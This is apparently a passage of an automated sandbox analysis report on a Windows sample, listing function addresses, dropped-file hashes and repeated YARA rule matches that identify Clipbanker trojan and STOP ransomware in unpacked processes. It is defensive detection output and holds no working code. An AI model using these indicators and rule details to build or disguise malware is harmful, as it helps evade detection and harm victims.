Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC3520	6_2_05EC3520
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC7520	6_2_05EC7520
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EED7F1	6_2_05EED7F1
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ECA79A	6_2_05ECA79A
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ECC760	6_2_05ECC760
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ECE6E0	6_2_05ECE6E0
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05F0B69F	6_2_05F0B69F
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ECA699	6_2_05ECA699
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EED1A4	6_2_05EED1A4
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05F0E141	6_2_05F0E141
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC9120	6_2_05EC9120
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC70E0	6_2_05EC70E0
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC30F0	6_2_05EC30F0
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ED00D0	6_2_05ED00D0
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ECB0B0	6_2_05ECB0B0
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ECA026	6_2_05ECA026
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EDF030	6_2_05EDF030
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ECB000	6_2_05ECB000
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC7393	6_2_05EC7393
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05F0E37C	6_2_05F0E37C
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05F422C0	6_2_05F422C0
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC7220	6_2_05EC7220
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC5DE7	6_2_05EC5DE7
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC5DF7	6_2_05EC5DF7
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05F02D1E	6_2_05F02D1E
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EF4E9F	6_2_05EF4E9F
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC8E60	6_2_05EC8E60
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC59F7	6_2_05EC59F7
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC89D0	6_2_05EC89D0
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EEE9A3	6_2_05EEE9A3
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EEF9B0	6_2_05EEF9B0
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EDA930	6_2_05EDA930
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ECA916	6_2_05ECA916
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EE18D0	6_2_05EE18D0
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC7880	6_2_05EC7880
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ECDBE0	6_2_05ECDBE0
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC2B60	6_2_05EC2B60
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ED0B00	6_2_05ED0B00
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC7A80	6_2_05EC7A80
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ECCA10	6_2_05ECCA10

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\build3[1].exe FEF2C8CA07C500E416FD7700A381C39899EE26CE1119F62E7C65CF922CE8B408
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqln[1].dll 036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: String function: 05EF0160 appears 50 times
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: String function: 05EE8EC0 appears 57 times
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: String function: 00428C81 appears 42 times
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: String function: 05EC8EC0 appears 57 times
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: String function: 05ED0160 appears 50 times
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: String function: 004547A0 appears 75 times
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: String function: 05DE0160 appears 50 times
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: String function: 05DD8EC0 appears 57 times
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: String function: 0042F7C0 appears 99 times
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: String function: 0044F23E appears 53 times
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: String function: 00428520 appears 77 times
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: String function: 00454E50 appears 42 times

Sample file is different than original file name gathered from version info

Source: R5391762lf.exe, 00000000.00000002.1373459929.00000000040A1000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFirez( vs R5391762lf.exe
Source: R5391762lf.exe, 00000002.00000003.1391294965.0000000002F71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFirez( vs R5391762lf.exe
Source: R5391762lf.exe, 00000002.00000000.1370901949.00000000040A1000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFirez( vs R5391762lf.exe
Source: R5391762lf.exe, 00000005.00000002.1404961018.00000000040A1000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFirez( vs R5391762lf.exe
Source: R5391762lf.exe, 00000006.00000002.1410752976.00000000040A1000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenameFirez( vs R5391762lf.exe
Source: R5391762lf.exe, 00000007.00000000.1401160691.00000000040A1000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFirez( vs R5391762lf.exe

Uses 32bit PE files

Source: R5391762lf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.8615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.8615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 19.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 19.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.9215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.9215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 13.2.build3.exe.8515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 13.2.build3.exe.8515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.9215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.9215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 5.2.R5391762lf.exe.5db15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.R5391762lf.exe.5db15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 19.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 19.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 13.2.build3.exe.8515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 13.2.build3.exe.8515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
